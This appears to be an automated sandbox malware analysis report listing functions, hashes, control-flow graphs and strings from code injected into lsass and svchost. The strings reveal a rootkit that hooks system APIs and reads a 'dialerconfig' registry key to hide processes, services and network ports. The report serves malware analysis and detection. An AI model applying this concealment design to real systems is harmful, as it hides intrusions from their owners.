                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction ID: 5dd3689bbf5aff6326420e2155b0704a08a6b82fadef4d17dfd39c7e7aa88bd7
                                                                      • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction Fuzzy Hash: 73112B36214B9183EBA18F1AE54435A77E5F789F94F684224EE8C07758DF3CC559CB01
                                                                      Function 000002A2911C7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction ID: 93edb5fb0b132fd7271519c893dfeed14cc6724839e9e44b018e956b99003819
                                                                      • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction Fuzzy Hash: D7E08661740B55E1DF458F26E88429933A0DB5AF64F989122995C06351FF38D1FDC301
                                                                      Function 000002A2911C73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction ID: ecf5bb12e97ae8ede17a702195ef0fb2d0f2a7e240cfa2b5847f99b30a39af29
                                                                      • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction Fuzzy Hash: 78E08C61B00B59E5DF468F26E88029973A0EB6AF64F989122CA4C06351FF38D1EDC301
                                                                      Function 000002A291991BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction ID: 464bcb97e3c9314eea8166744373369e2b388c1d326151b7449f27b6ebef7635
                                                                      • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction Fuzzy Hash: A2116025B01B95C2FA84DB6BE50822A67A1F78EFD4F684025DE4E43769DE38D44E8301
                                                                      Function 000002A291991268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction ID: 185b0546519f995496c93be5b0f86adfffaff4249d3f278c3fafc5b534794824
                                                                      • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction Fuzzy Hash: 39E03939701615C7FB448B67D90834A3EE1FB8EF06F948024890907391DF7D949DC751

                                                                      Executed Functions

                                                                      Function 00007FF7CBC81140 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.1422062977.00007FF7CBC81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CBC80000, based on PE: true
                                                                      • Associated: 00000025.00000002.1422010977.00007FF7CBC80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000025.00000002.1422108040.00007FF7CBC94000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000025.00000002.1422221876.00007FF7CBC98000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000025.00000002.1422518778.00007FF7CBF17000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000025.00000002.1422921466.00007FF7CC18D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000025.00000002.1422958258.00007FF7CC1C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000025.00000002.1422991910.00007FF7CC1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ff7cbc80000_updater.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                                      • Instruction ID: d9424d3d8c8c32e31cbb1f9a12b1c28336ecd4ce208c21b8459925fb74af9b43
                                                                      • Opcode Fuzzy Hash: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                                      • Instruction Fuzzy Hash: 29B01230D0435984F3213F19E84135872A06B0CB51FC01030E70C033B2CE7E54504B30

                                                                      Execution Graph

                                                                      Execution Coverage:0.7%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:66
                                                                      Total number of Limit Nodes:2
                                                                      execution_graph 14756 14e25ed1abc 14761 14e25ed1628 GetProcessHeap HeapAlloc 14756->14761 14758 14e25ed1ad2 Sleep SleepEx 14759 14e25ed1acb 14758->14759 14759->14758 14760 14e25ed1598 StrCmpIW StrCmpW 14759->14760 14760->14759 14805 14e25ed1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14761->14805 14763 14e25ed1650 14806 14e25ed1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14763->14806 14765 14e25ed1661 14807 14e25ed1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14765->14807 14767 14e25ed166a 14808 14e25ed1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14767->14808 14769 14e25ed1673 14770 14e25ed168e RegOpenKeyExW 14769->14770 14771 14e25ed18a6 14770->14771 14772 14e25ed16c0 RegOpenKeyExW 14770->14772 14771->14759 14773 14e25ed16e9 14772->14773 14774 14e25ed16ff RegOpenKeyExW 14772->14774 14809 14e25ed12bc RegQueryInfoKeyW 14773->14809 14775 14e25ed173a RegOpenKeyExW 14774->14775 14776 14e25ed1723 14774->14776 14779 14e25ed1775 RegOpenKeyExW 14775->14779 14780 14e25ed175e 14775->14780 14818 14e25ed104c RegQueryInfoKeyW 14776->14818 14784 14e25ed1799 14779->14784 14785 14e25ed17b0 RegOpenKeyExW 14779->14785 14783 14e25ed12bc 16 API calls 14780->14783 14786 14e25ed176b RegCloseKey 14783->14786 14787 14e25ed12bc 16 API calls 14784->14787 14788 14e25ed17eb RegOpenKeyExW 14785->14788 14789 14e25ed17d4 14785->14789 14786->14779 14792 14e25ed17a6 RegCloseKey 14787->14792 14790 14e25ed1826 RegOpenKeyExW 14788->14790 14791 14e25ed180f 14788->14791 14793 14e25ed12bc 16 API calls 14789->14793 14795 14e25ed184a 14790->14795 14796 14e25ed1861 RegOpenKeyExW 14790->14796 14794 14e25ed104c 6 API calls 14791->14794 14792->14785 14797 14e25ed17e1 RegCloseKey 14793->14797 14798 14e25ed181c RegCloseKey 14794->14798 14799 14e25ed104c 6 API calls 14795->14799 14800 14e25ed189c RegCloseKey 14796->14800 14801 14e25ed1885 14796->14801 14797->14788 14798->14790 14802 14e25ed1857 RegCloseKey 14799->14802 14800->14771 14803 14e25ed104c 6 API calls 14801->14803 14802->14796 14804 14e25ed1892 RegCloseKey 14803->14804 14804->14800 14805->14763 14806->14765 14807->14767 14808->14769 14810 14e25ed148a RegCloseKey 14809->14810 14811 14e25ed1327 GetProcessHeap HeapAlloc 14809->14811 14810->14774 14812 14e25ed1476 GetProcessHeap HeapFree 14811->14812 14813 14e25ed1352 RegEnumValueW 14811->14813 14812->14810 14814 14e25ed13a5 14813->14814 14814->14812 14814->14813 14816 14e25ed13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14814->14816 14817 14e25ed141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14814->14817 14823 14e25ed152c 14814->14823 14816->14817 14817->14814 14819 14e25ed11b5 RegCloseKey 14818->14819 14820 14e25ed10bf 14818->14820 14819->14775 14820->14819 14821 14e25ed10cf RegEnumValueW 14820->14821 14822 14e25ed114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14820->14822 14821->14820 14822->14820 14824 14e25ed1546 14823->14824 14827 14e25ed157c 14823->14827 14825 14e25ed155d StrCmpIW 14824->14825 14826 14e25ed1565 StrCmpW 14824->14826 14824->14827 14825->14824 14826->14824 14827->14814 14828 14e255d273c 14830 14e255d276a 14828->14830 14829 14e255d2858 LoadLibraryA 14829->14830 14830->14829 14831 14e255d28d4 14830->14831

                                                                      Executed Functions

                                                                      Function 0000014E25ED328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: ec4161c4f1973986df8c574484aa40d597b44ab65623eef5f4e9b84d014c0903
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: 45116DB1A3264082FBE49B25FF05FD922DCB79A345F5061249917855F6EFF9C1448350
                                                                      Function 0000014E25ED1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 0000014E25ED1628: GetProcessHeap.KERNEL32 ref: 0000014E25ED1633
                                                                        • Part of subcall function 0000014E25ED1628: HeapAlloc.KERNEL32 ref: 0000014E25ED1642
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED16B2
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED16DF
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED16F9
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1719
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED1734
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1754
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED176F
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED178F
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED17AA
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED17CA
                                                                      • Sleep.KERNEL32 ref: 0000014E25ED1AD7
                                                                      • SleepEx.KERNELBASE ref: 0000014E25ED1ADD
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED17E5
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1805
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED1820
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1840
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED185B
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED187B
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED1896
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED18A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: 4f9138a27f515c4560b724a4ce78d8a5789e6dff9fc277979641b626aa87eaa8
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: 4031BD7221264181EBD89B26DF51BE913EDBB8DBD4F0474219E0B876B6EE94C8518311
                                                                      Function 0000014E25ED3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 57 14e25ed3844-14e25ed384f 58 14e25ed3869-14e25ed3870 57->58 59 14e25ed3851-14e25ed3864 StrCmpNIW 57->59 59->58 60 14e25ed3866 59->60 60->58
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: dialer
                                                                      • API String ID: 0-3528709123
                                                                      • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                      • Instruction ID: 70b5d17667e6c287c63a42a861956bd54ed603b9f6973ac1a3c59364d2fced0b
                                                                      • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                      • Instruction Fuzzy Hash: 8DD0A77433220586FF94DFE6AEC4EE423DCFB08764F985024CD02012B0DB988D8D9710
                                                                      Function 0000014E255D273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: 61d15e7f8051c1c6ea22e4ab23ff41feee112f27c0d23cc355fd173832c7c0b5
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: F7615633F4229187DB54CF15CA40BADB3DAF755BA4F988121CE5A03798DA78D892C700

                                                                      Non-executed Functions

                                                                      Function 0000014E25ED2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 355 14e25ed2b2c-14e25ed2ba5 call 14e25ef2ce0 358 14e25ed2bab-14e25ed2bb1 355->358 359 14e25ed2ee0-14e25ed2f03 355->359 358->359 360 14e25ed2bb7-14e25ed2bba 358->360 360->359 361 14e25ed2bc0-14e25ed2bc3 360->361 361->359 362 14e25ed2bc9-14e25ed2bd9 GetModuleHandleA 361->362 363 14e25ed2bdb-14e25ed2beb GetProcAddress 362->363 364 14e25ed2bed 362->364 365 14e25ed2bf0-14e25ed2c0e 363->365 364->365 365->359 367 14e25ed2c14-14e25ed2c33 StrCmpNIW 365->367 367->359 368 14e25ed2c39-14e25ed2c3d 367->368 368->359 369 14e25ed2c43-14e25ed2c4d 368->369 369->359 370 14e25ed2c53-14e25ed2c5a 369->370 370->359 371 14e25ed2c60-14e25ed2c73 370->371 372 14e25ed2c83 371->372 373 14e25ed2c75-14e25ed2c81 371->373 374 14e25ed2c86-14e25ed2c8a 372->374 373->374 375 14e25ed2c9a 374->375 376 14e25ed2c8c-14e25ed2c98 374->376 377 14e25ed2c9d-14e25ed2ca7 375->377 376->377 378 14e25ed2d9d-14e25ed2da1 377->378 379 14e25ed2cad-14e25ed2cb0 377->379 380 14e25ed2da7-14e25ed2daa 378->380 381 14e25ed2ed2-14e25ed2eda 378->381 382 14e25ed2cc2-14e25ed2ccc 379->382 383 14e25ed2cb2-14e25ed2cbf call 14e25ed199c 379->383 387 14e25ed2dbb-14e25ed2dc5 380->387 388 14e25ed2dac-14e25ed2db8 call 14e25ed199c 380->388 381->359 381->371 385 14e25ed2cce-14e25ed2cdb 382->385 386 14e25ed2d00-14e25ed2d0a 382->386 383->382 385->386 390 14e25ed2cdd-14e25ed2cea 385->390 391 14e25ed2d3a-14e25ed2d3d 386->391 392 14e25ed2d0c-14e25ed2d19 386->392 394 14e25ed2dc7-14e25ed2dd4 387->394 395 14e25ed2df5-14e25ed2df8 387->395 388->387 399 14e25ed2ced-14e25ed2cf3 390->399 401 14e25ed2d4b-14e25ed2d58 lstrlenW 391->401 402 14e25ed2d3f-14e25ed2d49 call 14e25ed1bbc 391->402 392->391 400 14e25ed2d1b-14e25ed2d28 392->400 394->395 396 14e25ed2dd6-14e25ed2de3 394->396 397 14e25ed2dfa-14e25ed2e03 call 14e25ed1bbc 395->397 398 14e25ed2e05-14e25ed2e12 lstrlenW 395->398 404 14e25ed2de6-14e25ed2dec 396->404 397->398 414 14e25ed2e4a-14e25ed2e55 397->414 410 14e25ed2e35-14e25ed2e3f call 14e25ed3844 398->410 411 14e25ed2e14-14e25ed2e1e 398->411 408 14e25ed2cf9-14e25ed2cfe 399->408 409 14e25ed2d93-14e25ed2d98 399->409 412 14e25ed2d2b-14e25ed2d31 400->412 405 14e25ed2d7b-14e25ed2d8d call 14e25ed3844 401->405 406 14e25ed2d5a-14e25ed2d64 401->406 402->401 402->409 404->414 415 14e25ed2dee-14e25ed2df3 404->415 405->409 419 14e25ed2e42-14e25ed2e44 405->419 406->405 416 14e25ed2d66-14e25ed2d79 call 14e25ed152c 406->416 408->386 408->399 409->419 410->419 411->410 420 14e25ed2e20-14e25ed2e33 call 14e25ed152c 411->420 412->409 421 14e25ed2d33-14e25ed2d38 412->421 424 14e25ed2ecc-14e25ed2ed0 414->424 425 14e25ed2e57-14e25ed2e5b 414->425 415->395 415->404 416->405 416->409 419->381 419->414 420->410 420->414 421->391 421->412 424->381 430 14e25ed2e5d-14e25ed2e61 425->430 431 14e25ed2e63-14e25ed2e7d call 14e25ed85c0 425->431 430->431 434 14e25ed2e80-14e25ed2e83 430->434 431->434 437 14e25ed2ea6-14e25ed2ea9 434->437 438 14e25ed2e85-14e25ed2ea3 call 14e25ed85c0 434->438 437->424 440 14e25ed2eab-14e25ed2ec9 call 14e25ed85c0 437->440 438->437 440->424
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: 5f587f22587abd1431a1499f71e10d14118b5f21938d0c7cdf4f0e995d43f0cd
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: 5AB1AD72222A5086EBE98F25DE40BE963EDFB46B94F046016EE0A577B4DFB5CC40C340
                                                                      Function 0000014E25ED7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: a58b129de63e11622298d6c6a6695538686e417bbbb43f62ee147bc6e5dcd9c5
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: C5318272215B808AEBA09F60F840BED73B8F785754F54502ADB4E47BA9EF78C548C710
                                                                      Function 0000014E25EDD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction ID: 15f96c7993330800901423ecee5f9673b24142775bcc2ce8a9715945b3205e8b
                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction Fuzzy Hash: 12318072215F8086DBA0CF25E940BDE73E8F78A764F541126EA9E43BA9DF78C545CB00
                                                                      Function 0000014E25ED1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 106492572-2879589442
                                                                      • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction ID: c1bc9262416f542b9bcf67935fbe76358c1d3776086d0358d464ba4c20ede195
                                                                      • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction Fuzzy Hash: 32713A76721A1086EBA09F61EA80ADD23EDFB89B98F002115DE4F47B39DFB8C544C340
                                                                      Function 0000014E25ED12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: 7a8f22d71641694a9fd7ec0762583f57e8a0a7c965321d3c74b055877a6cee4e
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: F0516C72211B8486EB95CF62FA487AA77E9F389BE9F144124DA4A0772ADF7CC045C700
                                                                      Function 0000014E25ED1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: 8747b8a499e9052df40478483ed6c278368860711bb81c5df639d3b7e26418f2
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: 7031067462295AA0EB84EF65EF51FD863EEBB05358FD06017940B12176AFF8C249C390
                                                                      Function 0000014E255D6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
